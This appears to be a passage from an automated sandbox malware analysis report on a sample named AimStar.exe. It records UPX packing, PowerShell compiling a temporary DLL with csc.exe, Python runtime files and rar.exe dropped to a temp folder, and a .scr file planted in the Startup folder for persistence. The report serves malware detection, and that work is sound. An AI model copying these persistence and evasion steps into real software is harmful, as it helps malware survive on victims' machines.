              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8200330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8A8200330
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A815AC25 push rcx; ret 2_2_00007FF8A815AC62
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8474CD2A5 pushad ; iretd 12_2_00007FF8474CD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8475E9E38 push E9609479h; ret 12_2_00007FF8475E9E79
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8475E9E7A push E9609479h; ret 12_2_00007FF8475E9E79
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8476B9266 push esi; iretd 12_2_00007FF8476B9267
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: "C:\Users\user\Desktop\AimStar.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\libssl-3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scrJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F476B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF710F476B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
